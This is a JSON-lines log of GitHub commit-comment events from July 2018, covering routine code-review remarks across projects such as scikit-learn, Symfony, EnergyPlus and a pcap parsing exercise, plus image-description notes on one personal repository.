{"id":"8012307480","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29818918,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-24T19:33:13Z","updated_at":"2018-07-24T19:33:13Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-24T19:33:13Z"}
{"id":"8012307838","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818919,"position":127,"line":127,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:33:18Z","updated_at":"2018-07-24T19:33:18Z","author_association":"OWNER","body":"terrace plus a montain"}},"created_at":"2018-07-24T19:33:18Z"}
{"id":"8012311497","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818931,"position":159,"line":159,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:34:06Z","updated_at":"2018-07-24T19:34:06Z","author_association":"OWNER","body":"This one is supposed to be flamingos. impossible to distinguish"}},"created_at":"2018-07-24T19:34:06Z"}
{"id":"8012315102","type":"CommitCommentEvent","actor":{"login":"OpenUAS"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":29818940,"position":null,"line":null,"path":null,"commit_id":"a8f2d1041178aa1fb294dfb3156db70a494f5eb7","created_at":"2018-07-24T19:34:50Z","updated_at":"2018-07-24T19:34:50Z","author_association":"CONTRIBUTOR","body":"Nifty :thumbsup:"}},"created_at":"2018-07-24T19:34:50Z"}
{"id":"8012318830","type":"CommitCommentEvent","actor":{"login":"JonRowe"},"repo":{"name":"rspec/rspec-rails"},"payload":{"comment":{"id":29818944,"position":8,"line":248,"path":"lib/rspec/rails/matchers/active_job.rb","commit_id":"5da6e2a35e8bea9df3340bf4b6f23938a5b10740","created_at":"2018-07-24T19:35:36Z","updated_at":"2018-07-24T19:35:36Z","author_association":"MEMBER","body":"Good point, updated, the point was to make a more complex example that needs a block!"}},"created_at":"2018-07-24T19:35:36Z"}
{"id":"8012319988","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818949,"position":192,"line":192,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:35:51Z","updated_at":"2018-07-24T19:35:51Z","author_association":"OWNER","body":"humming bird flying left but i cant tell."}},"created_at":"2018-07-24T19:35:51Z"}
{"id":"8012321587","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818952,"position":223,"line":223,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:36:12Z","updated_at":"2018-07-24T19:36:12Z","author_association":"OWNER","body":"lake reflecting two mountains"}},"created_at":"2018-07-24T19:36:12Z"}
{"id":"8012324029","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818958,"position":255,"line":255,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:36:44Z","updated_at":"2018-07-24T19:36:44Z","author_association":"OWNER","body":"melting glacier waterfall in middle"}},"created_at":"2018-07-24T19:36:44Z"}
{"id":"8012325858","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818967,"position":287,"line":287,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:37:10Z","updated_at":"2018-07-24T19:37:10Z","author_association":"OWNER","body":"jaguar top left in tree but i cant tell"}},"created_at":"2018-07-24T19:37:10Z"}
{"id":"8012327972","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818973,"position":319,"line":319,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:37:36Z","updated_at":"2018-07-24T19:37:36Z","author_association":"OWNER","body":"whale in middle of screen"}},"created_at":"2018-07-24T19:37:36Z"}
{"id":"8012329354","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818976,"position":348,"line":348,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:37:54Z","updated_at":"2018-07-24T19:37:54Z","author_association":"OWNER","body":"most recognizable tree africa"}},"created_at":"2018-07-24T19:37:54Z"}
{"id":"8012329427","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29818977,"position":null,"line":null,"path":null,"commit_id":"430f1b187ca13d3aa1060f9b78d870537a309ad1","created_at":"2018-07-24T19:37:55Z","updated_at":"2018-07-24T19:37:55Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-374](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-374).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-374-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T19:37:55Z"}
{"id":"8012329579","type":"CommitCommentEvent","actor":{"login":"Aviseka"},"repo":{"name":"komalsrathi/Microarray_Analysis"},"payload":{"comment":{"id":29818978,"position":null,"line":null,"path":null,"commit_id":"4ecef78e9425dea78c2ee610a18a1e0c3a0687f9","created_at":"2018-07-24T19:37:56Z","updated_at":"2018-07-24T19:37:56Z","author_association":"NONE","body":"Dear Komal,\n\n \n\nThank you so much for your kind reply . The error while deploying oligo is the below I am bit new so please guide me . anyother information you would like to know kindly let me know.\n\n \n\nnamespace ‘BiocGenerics’ 0.26.0 is already loaded, but >= 0.27.1 is required\nError: package ‘oligoClasses’ could not be loaded\n\n \n\nR detail.-\n\nplatform       x86_64-w64-mingw32          \n\narch           x86_64                      \n\nos             mingw32                     \n\nsystem         x86_64, mingw32             \n\nstatus                                     \n\nmajor          3                           \n\nminor          5.1                         \n\nyear           2018                        \n\nmonth          07                          \n\nday            02                          \n\nsvn rev        74947                       \n\nlanguage       R                           \n\nversion.string R version 3.5.1 (2018-07-02)\n\nnickname       Feather Spray \n\n \n\n \n\nBest Regards\n\nAviseka Acharya\n\nInstitut für Neurophysiologie\n\nder Universität zu Köln\n\nRobert-Koch-Strasse 39\n\nD-50931 Köln\n\nTel.: +49 (0)221 478-97883\n\n <https://twitter.com/aviseka> twitter-icon  <https://www.facebook.com/aviseka.acharya> facebook-logo-png-9  <https://calendar.google.com/calendar?cid=MnQ3aTFqMGY3cjdvcXQ3bTdyNHIxcHZvNGdAZ3JvdXAuY2FsZW5kYXIuZ29vZ2xlLmNvbQ> \n\n\n\n \n\n\n\n \n\nFrom: Komal Rathi [mailto:notifications@github.com] \nSent: 07-24-2018 04 53\nTo: komalsrathi/Microarray_Analysis\nCc: Aviseka; Mention\nSubject: Re: [komalsrathi/Microarray_Analysis] get expressed probes (4ecef78)\n\n \n\n@Aviseka <https://github.com/Aviseka>  can you confirm that you have the R packages (oligo etc) mentioned in the Description?\nhttps://github.com/komalsrathi/Microarray_Analysis/blob/master/OligoTools/DESCRIPTION\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/komalsrathi/Microarray_Analysis/commit/4ecef78e9425dea78c2ee610a18a1e0c3a0687f9#commitcomment-29815529> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AnYzopxo8gYgjcJv7w_-jLy2DOrRq5Ujks5uJzTmgaJpZM4VcvOC> .  <https://github.com/notifications/beacon/AnYzoj5H6hbxwyqKc-U9JYJI30Cp-W48ks5uJzTmgaJpZM4VcvOC.gif> \n\n"}},"created_at":"2018-07-24T19:37:56Z"}
{"id":"8012332881","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":29818982,"position":56,"line":247,"path":"sklearn/decomposition/dict_learning.py","commit_id":"a52053deefb00fd15a4d9027fcddcad79bc5d83c","created_at":"2018-07-24T19:38:39Z","updated_at":"2018-07-24T19:38:39Z","author_association":"CONTRIBUTOR","body":"Why do these need to be C-ordered? Everywhere else they are F-ordered, which makes this pretty expensive as it must always copy and reorder them."}},"created_at":"2018-07-24T19:38:39Z"}
{"id":"8012332947","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818984,"position":382,"line":382,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:38:40Z","updated_at":"2018-07-24T19:38:40Z","author_association":"OWNER","body":"lake reflecting mountain in center"}},"created_at":"2018-07-24T19:38:40Z"}
{"id":"8012335088","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818987,"position":415,"line":415,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:39:07Z","updated_at":"2018-07-24T19:39:07Z","author_association":"OWNER","body":"fish in the ocean"}},"created_at":"2018-07-24T19:39:07Z"}
{"id":"8012335361","type":"CommitCommentEvent","actor":{"login":"evil-brain"},"repo":{"name":"evil-brain/swupd-client"},"payload":{"comment":{"id":29818988,"position":null,"line":null,"path":null,"commit_id":"66b20de170b342d4b473e6eef9447158fefba4c9","created_at":"2018-07-24T19:39:11Z","updated_at":"2018-07-24T19:39:11Z","author_association":"OWNER","body":"During the install case we don't really know the size of the changes that will occur as a result- for example, a bundle could be staged/partially staged, or an older version installed, making the required space for the bundle less than 'contentsize'.\r\n\r\nSince we can't fail/abort once we \"start the show\", we must check if the operation will succeed before starting. We will have to make assumptions. We must assume that when '--install' is passed, the user intends to install the OS to a 'new' directory (where no bundles are currently installed). Then, it makes sense to add up the size of all the bundles that will be 'installed' and report if too large.\r\n"}},"created_at":"2018-07-24T19:39:11Z"}
{"id":"8012336161","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"ITLabRTUMIREA/ITLab-Front"},"payload":{"comment":{"id":29818990,"position":null,"line":null,"path":null,"commit_id":"148a5a284bd9321d1113e954279244562d5d1927","created_at":"2018-07-24T19:39:22Z","updated_at":"2018-07-24T19:39:22Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Поиск по пользователям (пока что по email), так же как и в EventType](https://trello.com/c/EZeoz1s0/53-%D0%BF%D0%BE%D0%B8%D1%81%D0%BA-%D0%BF%D0%BE-%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8F%D0%BC-%D0%BF%D0%BE%D0%BA%D0%B0-%D1%87%D1%82%D0%BE-%D0%BF%D0%BE-email-%D1%82%D0%B0%D0%BA-%D0%B6%D0%B5-%D0%BA%D0%B0%D0%BA-%D0%B8-%D0%B2-eventtype)"}},"created_at":"2018-07-24T19:39:22Z"}
{"id":"8012336348","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818992,"position":447,"line":447,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:39:25Z","updated_at":"2018-07-24T19:39:25Z","author_association":"OWNER","body":"desert hill in the middle"}},"created_at":"2018-07-24T19:39:25Z"}
{"id":"8012338461","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818995,"position":479,"line":479,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:39:53Z","updated_at":"2018-07-24T19:39:53Z","author_association":"OWNER","body":"trees cliff, lake in the middle"}},"created_at":"2018-07-24T19:39:53Z"}
{"id":"8012338869","type":"CommitCommentEvent","actor":{"login":"browner12"},"repo":{"name":"symfony/http-foundation"},"payload":{"comment":{"id":29818997,"position":null,"line":null,"path":null,"commit_id":"f3d7d66f0a2170372a20292a940a294f34302c8e","created_at":"2018-07-24T19:39:58Z","updated_at":"2018-07-24T19:39:58Z","author_association":"NONE","body":"we are not overriding the constructor, we are simply inheriting it from Symfony.\r\n\r\nand IMO, you are not deprecating the signature if you are changing it. to me, deprecation means I should be able to call the method, and have it work in either version, which in this case it does not."}},"created_at":"2018-07-24T19:39:58Z"}
{"id":"8012339518","type":"CommitCommentEvent","actor":{"login":"martinapre"},"repo":{"name":"martinapre/martinapre.github.io"},"payload":{"comment":{"id":29818999,"position":null,"line":null,"path":null,"commit_id":"4ee1a7ea763f9d641b6d8d1e4523e9109e7054f8","created_at":"2018-07-24T19:40:09Z","updated_at":"2018-07-24T19:40:09Z","author_association":"OWNER","body":"relative_links"}},"created_at":"2018-07-24T19:40:09Z"}
{"id":"8012340655","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29819003,"position":512,"line":512,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:40:21Z","updated_at":"2018-07-24T19:40:21Z","author_association":"OWNER","body":"glacier rough waters below small penguins up top."}},"created_at":"2018-07-24T19:40:21Z"}
{"id":"8012342966","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29819012,"position":544,"line":544,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:40:52Z","updated_at":"2018-07-24T19:40:52Z","author_association":"OWNER","body":"jaguar with baby jaguar middle left."}},"created_at":"2018-07-24T19:40:52Z"}
{"id":"8012343683","type":"CommitCommentEvent","actor":{"login":"stepanenco"},"repo":{"name":"stepserh/hello-world"},"payload":{"comment":{"id":29819013,"position":null,"line":null,"path":null,"commit_id":"ddb75c85460c304bc094f6190f2dfc3cec9ad33d","created_at":"2018-07-24T19:41:00Z","updated_at":"2018-07-24T19:41:00Z","author_association":"NONE","body":"good job for beginning"}},"created_at":"2018-07-24T19:41:00Z"}
{"id":"8012355313","type":"CommitCommentEvent","actor":{"login":"jasekiw"},"repo":{"name":"react-navigation/react-navigation"},"payload":{"comment":{"id":29819046,"position":null,"line":null,"path":null,"commit_id":"c0b637df520002704182718b395a7b806080cf28","created_at":"2018-07-24T19:43:24Z","updated_at":"2018-07-24T19:43:24Z","author_association":"NONE","body":"Thank you! This fixed my header title centering issue!"}},"created_at":"2018-07-24T19:43:24Z"}
{"id":"8012356349","type":"CommitCommentEvent","actor":{"login":"medied"},"repo":{"name":"DemocracyEarth/sovereign"},"payload":{"comment":{"id":29819052,"position":16,"line":822,"path":"imports/api/transactions/transaction.js","commit_id":"22cfacd1296f29997481ec1d9934a421a1d6cf1a","created_at":"2018-07-24T19:43:37Z","updated_at":"2018-07-24T19:43:37Z","author_association":"MEMBER","body":"- One decision being made with this PR would be modularizing the initial balance loading into this new method (and hence different than `_genesisTransaction()`). Because the way Metamask users are being created within the app is different than regular users, I'm thinking it makes sense to have this separate method for balance loading. This is also looking into the future, thinking it would add more flexibility when the time comes where this sort of feature will be needed for all users.\r\n\r\n- With this PR the `wallet.available` variable is being reset every time a user logs in, leaving it as such for testing purposes for now. This is where the daemon would come in and keep numbers in sync."}},"created_at":"2018-07-24T19:43:37Z"}
{"id":"8012357329","type":"CommitCommentEvent","actor":{"login":"mysuf"},"repo":{"name":"googleads/videojs-ima"},"payload":{"comment":{"id":29819053,"position":null,"line":null,"path":null,"commit_id":"d8cb13d833efce9357015e8b9f6cf97627c0d1d4","created_at":"2018-07-24T19:43:49Z","updated_at":"2018-07-24T19:43:49Z","author_association":"NONE","body":"As I already mentioned in one of your PR, this functionality duplicates what contrib-ads already does. There is also bug (same as I reported in contrib-ads), when multiple sources are present. It restores only one source and loose others which breaks any plugin or functionality working with multiple sources (like quality selector and etc)"}},"created_at":"2018-07-24T19:43:49Z"}
{"id":"8012358390","type":"CommitCommentEvent","actor":{"login":"AlbertLeeee"},"repo":{"name":"CptCold123/SaitFTCTeam1"},"payload":{"comment":{"id":29819054,"position":null,"line":null,"path":null,"commit_id":"78d7696638a2111bb8db5da9c408d85cdf9869d2","created_at":"2018-07-24T19:44:02Z","updated_at":"2018-07-24T19:44:02Z","author_association":"COLLABORATOR","body":"First"}},"created_at":"2018-07-24T19:44:02Z"}
{"id":"8012362906","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"SergAgui/netcore-workbook"},"payload":{"comment":{"id":29819068,"position":2,"line":2,"path":"AnotherApp/AnotherApp/Views/_MyLayout/_MyLayout.cshtml","commit_id":"06bdc1a0022074eee2df7e199a346641a4d7a1ef","created_at":"2018-07-24T19:45:00Z","updated_at":"2018-07-24T19:45:00Z","author_association":"NONE","body":"What would happen if you left this in?"}},"created_at":"2018-07-24T19:45:00Z"}
{"id":"8012365028","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29819075,"position":29,"line":36,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-24T19:45:27Z","updated_at":"2018-07-24T19:45:27Z","author_association":"NONE","body":"e_h_e_type 값은 코드 상에서 0x0008이 아닌 0x0800과 비교를 할 수 있도록 코드 수정 요망."}},"created_at":"2018-07-24T19:45:27Z"}
{"id":"8012365812","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"SergAgui/netcore-workbook"},"payload":{"comment":{"id":29819079,"position":6,"line":2,"path":"AnotherApp/AnotherApp/Views/_MyLayout/_MyLayout.cshtml","commit_id":"06bdc1a0022074eee2df7e199a346641a4d7a1ef","created_at":"2018-07-24T19:45:37Z","updated_at":"2018-07-24T19:45:37Z","author_association":"NONE","body":"Why are you doing this?"}},"created_at":"2018-07-24T19:45:37Z"}
{"id":"8012367885","type":"CommitCommentEvent","actor":{"login":"doverride"},"repo":{"name":"fedora-selinux/selinux-policy-contrib"},"payload":{"comment":{"id":29819084,"position":null,"line":null,"path":null,"commit_id":"28dd62cff35bfdb13046cd4785b1f345b611c2c7","created_at":"2018-07-24T19:46:02Z","updated_at":"2018-07-24T19:46:02Z","author_association":"CONTRIBUTOR","body":"This was added by mistake.\r\n\r\nThere was a recent iptables update recently that pointed /usr/sbin/iptables to a new binary called xtables-legacy-multi. This binary must have been mislabeled in this event and caused firewalld ro be able to execute iptables in the firewalld_t domain. \r\n\r\n```\r\nJul 24 10:15:25 localhost.localdomain audit[1058]: AVC avc:  denied  { getopt } for  pid=1058 comm=\"iptables\" lport=255 scontext=system_u:system_r:firewalld_t:s0 tcontext=system_u:system_r:firewalld_t:s0 tclass=rawip_socket permissive=1\r\n```\r\n\r\nI suspect that all the firewalld_t related commits in the last few day's should be reverted and that it should be ensured that /usr/sbin/xtables-legacy-multi has the proper label so that firewalld runs iiptables with a domain transition to the proper iptables domain"}},"created_at":"2018-07-24T19:46:02Z"}
{"id":"8012371171","type":"CommitCommentEvent","actor":{"login":"mevlanaayas"},"repo":{"name":"Unichain-turkey/unichaintr.com"},"payload":{"comment":{"id":29819091,"position":null,"line":null,"path":null,"commit_id":"65bf42aa9d550eca43313b84aea6cf744cccf3b2","created_at":"2018-07-24T19:46:43Z","updated_at":"2018-07-24T19:46:43Z","author_association":"MEMBER","body":"font boyutlari neden degistirildi?"}},"created_at":"2018-07-24T19:46:43Z"}
{"id":"8012372217","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29819096,"position":57,"line":71,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-24T19:46:57Z","updated_at":"2018-07-24T19:46:57Z","author_association":"NONE","body":"th_sport 값을 hexa decimal로 출려하지 말고 십진수로 출력하세요, 아래 th_dport도 동일."}},"created_at":"2018-07-24T19:46:57Z"}
{"id":"8012372781","type":"CommitCommentEvent","actor":{"login":"tnayanam"},"repo":{"name":"tnayanam/WebApi"},"payload":{"comment":{"id":29819098,"position":null,"line":null,"path":null,"commit_id":"300cdcb562aa140da565d0bdb99444875d91e24c","created_at":"2018-07-24T19:47:05Z","updated_at":"2018-07-24T19:47:05Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/17131576/43162370-cef401b4-8f58-11e8-9379-1f2a0d8f70ac.png)\r\n"}},"created_at":"2018-07-24T19:47:05Z"}
{"id":"8012373113","type":"CommitCommentEvent","actor":{"login":"mevlanaayas"},"repo":{"name":"Unichain-turkey/unichaintr.com"},"payload":{"comment":{"id":29819100,"position":null,"line":null,"path":null,"commit_id":"f399c1da48cb7cfca3970f50adc8c51b7225a6c6","created_at":"2018-07-24T19:47:09Z","updated_at":"2018-07-24T19:47:09Z","author_association":"MEMBER","body":"yeni eklenen js dosyalari ne icin eklendi?"}},"created_at":"2018-07-24T19:47:09Z"}
{"id":"8012373275","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Rbrey/ASP-.NET-Workbook"},"payload":{"comment":{"id":29819101,"position":3,"line":3,"path":"Lesson2/MySecondApp/Views/Shared/_MyLayout.cshtml","commit_id":"46305d2f3a3fc898ff282b668caf49e22d8e1109","created_at":"2018-07-24T19:47:11Z","updated_at":"2018-07-24T19:47:11Z","author_association":"NONE","body":"Can you explain what this is used for?"}},"created_at":"2018-07-24T19:47:11Z"}
{"id":"8012374693","type":"CommitCommentEvent","actor":{"login":"medied"},"repo":{"name":"DemocracyEarth/sovereign"},"payload":{"comment":{"id":29819103,"position":24,"line":830,"path":"imports/api/transactions/transaction.js","commit_id":"22cfacd1296f29997481ec1d9934a421a1d6cf1a","created_at":"2018-07-24T19:47:28Z","updated_at":"2018-07-24T19:47:28Z","author_association":"MEMBER","body":"The wallet schema is still expecting numbers. The way I'm thinking about this is that we handle crypto balances in `bigNumbers` for all math operations (this should be fun😐) and convert `toNumber()` only when needed like here."}},"created_at":"2018-07-24T19:47:28Z"}
{"id":"8012376397","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29819110,"position":71,"line":85,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-24T19:47:51Z","updated_at":"2018-07-24T19:47:51Z","author_association":"NONE","body":"TCP Data의 크기가 16바이트 미만이라면 buffer overflow의 위험성이 존재함.\r\nmin(tcp_data_length, 16)까지 for 문을 돌릴 수 있도록 tcp_data_len값을 구할 것."}},"created_at":"2018-07-24T19:47:51Z"}
{"id":"8012377109","type":"CommitCommentEvent","actor":{"login":"xabbuh"},"repo":{"name":"symfony/http-foundation"},"payload":{"comment":{"id":29819113,"position":null,"line":null,"path":null,"commit_id":"f3d7d66f0a2170372a20292a940a294f34302c8e","created_at":"2018-07-24T19:48:00Z","updated_at":"2018-07-24T19:48:00Z","author_association":"MEMBER","body":"It should work. You will just the deprecation notice to be aware of the pending BC break in Symfony 5.0. if that's not the case, please open a new issue in the `symfony/symfony` repository."}},"created_at":"2018-07-24T19:48:00Z"}
{"id":"8012377564","type":"CommitCommentEvent","actor":{"login":"f1vefour"},"repo":{"name":"Owersun/linux-hardkernel"},"payload":{"comment":{"id":29819116,"position":null,"line":null,"path":null,"commit_id":"0925a367c842f7f5599fa528e05379bb1d7bbff9","created_at":"2018-07-24T19:48:05Z","updated_at":"2018-07-24T19:48:05Z","author_association":"NONE","body":"Indeed fixed, thanks."}},"created_at":"2018-07-24T19:48:05Z"}
{"id":"8012383724","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29819127,"position":null,"line":null,"path":null,"commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-24T19:49:20Z","updated_at":"2018-07-24T19:49:20Z","author_association":"NONE","body":"You could teach `Map` to accept the state of `X` and `Y` positions in its constructor for instance. There's no controller here, the test is the controller: it puts all objects in a specific state (as needed by the scenario of the test), then it makes assertions against one or more objects, to see if they behave correctly, given the provided configuration."}},"created_at":"2018-07-24T19:49:20Z"}
{"id":"8012384859","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/srax-front-test"},"payload":{"comment":{"id":29819129,"position":null,"line":null,"path":null,"commit_id":"0285df34670482dba0243771235b9e612fbc801e","created_at":"2018-07-24T19:49:34Z","updated_at":"2018-07-24T19:49:34Z","author_association":"OWNER","body":"![screen shot 2018-07-24 at 2 49 01 pm](https://user-images.githubusercontent.com/13053013/43162479-c3d36fa2-8f50-11e8-8223-00fc563bb17b.png)\r\n"}},"created_at":"2018-07-24T19:49:34Z"}
{"id":"8012384945","type":"CommitCommentEvent","actor":{"login":"medied"},"repo":{"name":"DemocracyEarth/sovereign"},"payload":{"comment":{"id":29819130,"position":1,"line":1,"path":"imports/api/blockchain/modules/web3Util.js","commit_id":"22cfacd1296f29997481ec1d9934a421a1d6cf1a","created_at":"2018-07-24T19:49:36Z","updated_at":"2018-07-24T19:49:36Z","author_association":"MEMBER","body":"Looking for feedback if `/imports/api/blockchain/modules/` is a good place for this sort of new file"}},"created_at":"2018-07-24T19:49:36Z"}
{"id":"8012385462","type":"CommitCommentEvent","actor":{"login":"backslash112"},"repo":{"name":"globalchat-online/globalchat-angular"},"payload":{"comment":{"id":29819136,"position":29,"line":28,"path":"src/app/components/conversation-list/conversation-list.component.ts","commit_id":"4831fbdb2061c8641cf667d59b8679013d01fe30","created_at":"2018-07-24T19:49:42Z","updated_at":"2018-07-24T19:49:42Z","author_association":"MEMBER","body":"This works, but it's not a good way, there must be a better method to achieve that."}},"created_at":"2018-07-24T19:49:42Z"}
{"id":"8012390851","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29819152,"position":72,"line":86,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-24T19:50:47Z","updated_at":"2018-07-24T19:50:47Z","author_association":"NONE","body":"hexadecimal 값을 출력할 때에는 \"%x\" 보다는 \"%02x\" 로 출력하는 것이 보기 편함."}},"created_at":"2018-07-24T19:50:47Z"}
{"id":"8012393936","type":"CommitCommentEvent","actor":{"login":"NekoNoor"},"repo":{"name":"Reisyukaku/ReiNX"},"payload":{"comment":{"id":29819163,"position":null,"line":null,"path":null,"commit_id":"62b9bf273d31f21030beb2c6196fae5aa6c49c21","created_at":"2018-07-24T19:51:26Z","updated_at":"2018-07-24T19:51:26Z","author_association":"COLLABORATOR","body":"People have reported it working fine on 3.0.1 so not sure why it wasn't working for the one person that tested it on 3.0.1"}},"created_at":"2018-07-24T19:51:26Z"}
{"id":"8012393967","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Rbrey/ASP-.NET-Workbook"},"payload":{"comment":{"id":29819164,"position":null,"line":null,"path":null,"commit_id":"46305d2f3a3fc898ff282b668caf49e22d8e1109","created_at":"2018-07-24T19:51:27Z","updated_at":"2018-07-24T19:51:27Z","author_association":"NONE","body":"Where does your page change the layout based on the time?"}},"created_at":"2018-07-24T19:51:27Z"}
{"id":"8012397241","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29819174,"position":350,"line":350,"path":"remove-some-ending-characters","commit_id":"a355daa108ed650dac47ff274ab65a77a51578de","created_at":"2018-07-24T19:52:05Z","updated_at":"2018-07-24T19:52:05Z","author_association":"OWNER","body":"This is a tree"}},"created_at":"2018-07-24T19:52:05Z"}
